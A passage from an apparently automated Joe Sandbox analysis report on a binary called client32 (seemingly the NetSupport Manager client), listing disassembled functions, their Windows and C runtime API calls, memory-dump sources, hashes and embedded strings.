                                                                                                                                                                                                    • DeleteMenu.USER32(?,00000001,00000400), ref: 1113F332
                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000001), ref: 1113F33A
                                                                                                                                                                                                    • DeleteMenu.USER32(?,-00000001,00000400), ref: 1113F351
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$Item$Delete$Count
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1985338998-0
                                                                                                                                                                                                    • Opcode ID: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction ID: 90b1ebb2a37eac89ef99d909188e48f60dab5b42f4deb930a222ec681177ebb5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: db8ccf8eb5a065f9716819879bea2f70c374054ad31006cd5f0d5a6c3e74d67c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F117C7680421ABBE702DB618CC8AAEFB7CEFC566AF108029F695D2144E7749541CB63
                                                                                                                                                                                                    Function 68856A27 Relevance: 12.1, APIs: 8, Instructions: 69COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,688568DE,?,?), ref: 68856A33
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(?,?,688568DE,?,?), ref: 68856A3E
                                                                                                                                                                                                      • Part of subcall function 6885AF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6882B6CF,?,6882C24B,00000003,688074A4,687EA948,0000000C,688074F7,00000001,00000001), ref: 6885AF85
                                                                                                                                                                                                    • _errno.MSVCR100(?,?,?,688568DE,?,?), ref: 68856A50
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4106058386-0
                                                                                                                                                                                                    • Opcode ID: 0001f785d051f6d9c94de3f493aa852317515682c57f88328d439108f53544a5
                                                                                                                                                                                                    • Instruction ID: bbdf44e515c1cfef92270144effbd8f5e4a469d4e294a2f58d13868fde80013a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0001f785d051f6d9c94de3f493aa852317515682c57f88328d439108f53544a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C11D671500248EFEF629F64CD48B9F7BB9EB823A4F548621FA24E71D0DB308954C6A1
                                                                                                                                                                                                    Function 687F0AC0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 206COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR100(00000000,00000000,687E6D5D,?,000000BC,?,00000000,00000000,00000005), ref: 687F5C28
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR100(00000000,00000000,687E6D5D,?,000000BC,?,00000000,00000000,00000005), ref: 6880A1A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: $$]m~h
                                                                                                                                                                                                    • API String ID: 2959964966-2449694041
                                                                                                                                                                                                    • Opcode ID: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                                                                                                                    • Instruction ID: 5c09b90b08d8cc8107cc27f44b40f90c994e5bc55b9b16b70b4497593af0b37b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49fda4f6a094257791eea7f6bc6f4a7ed63ef16df526c4610a0540b5aaf2a7a5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9471E43094520ACFDB11CF6DCE54BAA3BB1AF0231DF904579D871AB791C3358A92CBA1
                                                                                                                                                                                                    Function 11043050 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _free.LIBCMT ref: 110430DC
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • _free.LIBCMT ref: 110430FC
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 1104312A
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 11043167
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110431B2
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 110431F2
                                                                                                                                                                                                    • _strncpy.LIBCMT ref: 1104323B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _strncpy$_free$ErrorFreeHeapLast
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1231584600-0
                                                                                                                                                                                                    • Opcode ID: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
                                                                                                                                                                                                    • Instruction ID: 3e0d8ed6fad75e9b70bada9a66dea6ffd8c5f444cdc47759be8d9c1188c0d16e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57f5ffb5089c12c02a377bb6fa8bf421173bcb8552d8deb20583c806e30e8182
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB615DB5E047199FD760CFB9C884BCAFBF9BB55308F0049ADD58997200DAB4A980CF91
                                                                                                                                                                                                    Function 1101F140 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1101F1B1
                                                                                                                                                                                                      • Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                                                                                      • Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                                                                                    • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,00000000), ref: 1101F2C5
                                                                                                                                                                                                    • GetSaveFileNameA.COMDLG32(?), ref: 1101F2E7
                                                                                                                                                                                                    • _fputs.LIBCMT ref: 1101F313
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FolderPath$FileName$ModuleSave_fputs_memset
                                                                                                                                                                                                    • String ID: ChatPath$X
                                                                                                                                                                                                    • API String ID: 2661292734-3955712077
                                                                                                                                                                                                    • Opcode ID: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction ID: 6a45e0ccd222e521db2cf8660e7e75a9c6c8819791f7e0b2186df894ceae34f3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d7448241aee43a2d8f22d35a57381c1f70013038142bcfdf2693d044c7d6820
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51C275E043299FEB21DF60CC48BDEFBB4AF45704F1041D9D909AB280EB75AA84CB91
                                                                                                                                                                                                    Function 110095D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110CF020: wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009686
                                                                                                                                                                                                    • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100969B
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • IsA(), xrefs: 1100963D, 11009665
                                                                                                                                                                                                    • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009695
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009638, 11009660
                                                                                                                                                                                                    • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009609
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                                    • API String ID: 863766397-389219706
                                                                                                                                                                                                    • Opcode ID: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction ID: a1209e8bcef48249843ed2990b636ee265ac836deafb44f4c9fe9e5cc28cb7ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9ab368e51e575faf8e801c944165846c0240e679e3174c5e2828c94065c910c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 18215E75A0061DABDB00DF95DC81FEEF3B8EF48714F104259E925B3280EB746904CBA1
                                                                                                                                                                                                    Function 1115F5C2 Relevance: 10.6, APIs: 7, Instructions: 74COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5D7
                                                                                                                                                                                                    • DecodePointer.KERNEL32(?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F5E4
                                                                                                                                                                                                    • __realloc_crt.LIBCMT ref: 1115F621
                                                                                                                                                                                                    • __realloc_crt.LIBCMT ref: 1115F637
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F649
                                                                                                                                                                                                    • EncodePointer.KERNEL32(11019A91,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F65D
                                                                                                                                                                                                    • EncodePointer.KERNEL32(-00000004,?,0000000F,00000000,?,?,1115F6C6,11019A91,111D6F60,0000000C,1115F6F2,11019A91,?,11019A91), ref: 1115F665
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$Encode$Decode__realloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4108716018-0
                                                                                                                                                                                                    • Opcode ID: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction ID: 865a5de33b780d49622554ffb0a8386059ac67280241af18dea6a2ab0d8d04ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f4e889e69cccff6c52dc0f6799f7d199ddbbbff2afac02f1e6d7e91f36d2e5d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF11E976601227AFD7419FB5CCC085AFBE9EB41268715043BE826D3160FB71ED10CB61
                                                                                                                                                                                                    Function 6882697F Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 68826986
                                                                                                                                                                                                    • InitializeSListHead.KERNEL32(?,00000010,68826D69,00000000,?), ref: 688269A4
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 688269D7
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 688269EF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000), ref: 688269FD
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 68826A17
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 68826A25
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionH_prolog3HeadInitializeListThrow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3312236879-0
                                                                                                                                                                                                    • Opcode ID: e37c73066b0ab8e518d46482837f42225effc3d0a08fe30cdec701a3a29e5502
                                                                                                                                                                                                    • Instruction ID: f31d87db972289a8bd310a69eddeb588bc15d0a716b48184ba013887ef971b03
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e37c73066b0ab8e518d46482837f42225effc3d0a08fe30cdec701a3a29e5502
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E219D75540606DFDB51DF68C9647AFB7F4BF0A304B908829E55AD7200EB30EA81CBA1
                                                                                                                                                                                                    Function 68818ACC Relevance: 10.6, APIs: 7, Instructions: 65threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 68818AD3
                                                                                                                                                                                                      • Part of subcall function 688162E7: __EH_prolog3.LIBCMT ref: 688162EE
                                                                                                                                                                                                      • Part of subcall function 688162E7: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,68818AE8,?,000000FF), ref: 68816365
                                                                                                                                                                                                      • Part of subcall function 688162E7: _memset.LIBCMT(00000000,00000000,?,00000000,68818AE8,?,000000FF), ref: 68816377
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,68820C24,00000000,00000000,00000000,?,?,00000000,6887FF1C), ref: 68818B03
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B13
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B2B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR100(?,68880C48,00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B39
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6887FF1C,000000FF,?,68820AE8,?,?,?,00000000), ref: 68818B4B
